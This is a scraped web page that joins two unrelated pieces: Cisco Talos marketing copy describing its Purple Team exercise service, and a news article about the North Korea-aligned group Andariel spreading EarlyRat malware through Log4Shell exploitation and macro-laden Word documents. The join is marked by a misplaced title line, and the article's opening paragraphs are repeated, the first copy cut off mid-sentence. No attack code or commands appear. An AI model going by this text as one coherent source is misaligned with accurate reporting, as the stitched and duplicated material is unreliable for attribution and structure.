These Purple Team exercises also help organizations optimize their security investments by identifying weaknesses in their current security toolsets. Once these gaps are identified and shared your organization has more insightful data to support future cybersecurity solutions investments. Making informed decisions about where to allocate resources will mitigate the risk of wasting resources on ineffective cybersecurity solutions and can ensure your financial investments are optimized to meet your needs today and tomorrow.

Purple Team exercises also offer a valuable opportunity for knowledge exchange between members of the Blue and Red Teams.

*   The Red Team learns more from the Blue Team about the different security controls that are in place and tries to identify new ways to circumvent these controls.
*   The Blue Team, on the other hand, gains insights into the specific techniques used by the adversaries to compromise the environment, including specific tools and attack scripts.

Internal defenders, employed by the organization, use the firsthand experience from the Purple Team to update and optimize their monitoring and detection capabilities and build new processes.

**Testing approach and steps**

Purple Team exercises have been designed around the MITRE ATT&CK Framework to provide common terminology for identifying and blocking commonly used adversarial TTPs.

During the engagement, Talos Red Team and Talos Incident Response teams work together with the customer’s team to exchange knowledge about common attacks and corresponding detection. The responders from Talos IR collaborated closely with the customer security teams to properly identify all techniques executed by Talos Red Team and verify the defense’s actions. The workshop-style Purple Team engagement increases team trust among members of the internal security team and creates a base to improve the overall organization’s resilience against active threats. With clearly defined steps Talos IR collaborates with your organization’s security teams to properly identify all techniques executed by Talos Red Team and verifies the recorded activity.

The Purple Team exercise starts with the customer and Cisco Talos jointly defining and testing attack scenarios based on the organization’s existing security capabilities. An important part of this process is an evaluation of the strengths and weaknesses across different deployed security capabilities and the identification of areas of concern.

The final scenario is uniquely crafted to meet the risk concerns of the organization in terms of protecting its environment and “crown jewel” assets. A document with scenario details is agreed upon with the organization’s representatives before launching the agreed attack. Throughout the active execution of the attack, the Cisco Talos team will document the response of the security team by collecting detailed notes on topics such as the coverage of the security capabilities, availability of telemetry to detect and analyze the TTPs and, finally, the overall organization.

Integrating threat intelligence into our exercises helps organizations better understand the threats that they face and identify potential vulnerabilities in their security defenses. The intelligence data from Cisco Talos is a key differentiator of our Purple Team capabilities. The Cisco Talos team incorporates threat intelligence data from historical threats related to your organization's unique industry vertical and geography, as well as information on current adversary activity to create your tailored attack scenario. To protect your organization, Cisco Talos offers publicly available Threat Assessment Reports, which are published quarterly and yearly, and are an integral component used to build scenarios based on the latest threat intelligence. The final scenario aims to emulate as closely as possible a specific real-life threat that was analyzed by Talos in the wild, often leveraging existing research on observed threats and direct emergency response experience.

The outcome of the Purple Team exercise heavily relies on visibility into the organization's environment. The Security Operations Team within your organization relies on the existence of sufficient logs and properly configured security tools to quickly identify threats targeting the environment and stop them at an early stage. Verification of detection capabilities and visibility gives the team insights about potential gaps and better preparation for incidents.

Below is a list of standard tools that the Purple Team could use depending on the specific needs of the engagement:

*   Antivirus and Endpoint Detection and Response (EDR)
*   Traditional, Next-Generation and Web Application Firewall(s)
*   NetFlow and Network Telemetry
*   Email Server and Security Appliance Logs
*   DNS Security and Visibility Logs
*   Operating System and Application Logs
*   Auxiliary Operating System Logs
*   Proxy Network Logs
*   Application Logs
*   Data Loss Prevention Logs

**Attack scenario execution**

During the delivery of a Purple Team exercise, Talos IR team supports actively but non-intrusively the security team with detection and identification activities. As the Talos Red team executes step-by-step the pre-defined attack, compromising selected hosts or parts of the environment, Talos IR, in collaboration with the customer’s security team, works on detection across applicable security capabilities and cross-referencing logs to gain full identification of the attack.

For each TTP used by the attacker, the Talos IR team documents the following attributes of the security team’s response:

*   Logged, Alerted, and Mitigated
*   Logged and Alerted
*   Logged and Mitigated
*   Alerted and Mitigated
*   Not Detected

This type of detailed documentation builds up the foundation for the post-exercise report.

**Attack scenario results and reporting**

The Purple Team engagement concludes with a report and a debrief session. The report summarizes the overall activities during the exercise, the preparatory actions in the scenario-building phase, and the results of the detection and response verification. This engagement report serves as a foundation for future improvement of environment detection capabilities and paves the way for enhanced security resilience of the company.

Please contact your Cisco Account Team representatives or directly email Talos IR if you are interested or have questions regarding our new Purple Team service.

How Talos IR’s Purple Team can help you prepare for the worst-case scenario

The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year.
"Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report.
Also called Silent Chollima and Stonefly,

The North Korea-aligned threat actor known as **Andariel** leveraged a previously undocumented malware called **EarlyRat** in attacks exploiting the Log4j Log4Shell vulnerability last year.

"Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report.

Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff) and other subordinate elements collectively tracked under the umbrella name Lazarus Group.

The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income to the sanctions-hit nation.

Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backdoors such as Dtrack (aka Valefor and Preft), NukeSped (aka Manuscrypt), MagicRAT, and YamaBot.

NukeSped contains a range of features to create and terminate processes and move, read, and write files on the infected host. The use of NukeSped overlaps with a campaign tracked by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) under the name TraderTraitor.

Andariel's weaponization of the Log4Shell vulnerability in unpatched VMware Horizon servers was previously documented by AhnLab Security Emergency Response Center (ASEC) and Cisco Talos in 2022.

The latest attack chain discovered by Kaspsersky shows that EarlyRat is propagated by means of phishing emails containing decoy Microsoft Word documents. The files, when opened, prompt the recipients to enable macros, leading to the execution of VBA code responsible for downloading the trojan.

Described as a simple but limited backdoor, EarlyRat is designed to collect and exfiltrate system information to a remote server as well as execute arbitrary commands. It also shares high-level similarities with MagicRAT, not to mention written using a framework called PureBasic. MagicRAT, on the other hand, employs the Qt Framework.

Another characteristic of the intrusion is the use of legitimate off-the-shelf tools like 3Proxy, ForkDump, NTDSDumpEx, Powerline, and PuTTY for further exploitation of the target.

"Despite being an APT group, Lazarus is known for performing typical cyber crime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated," Kaspersky said. "Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#cisco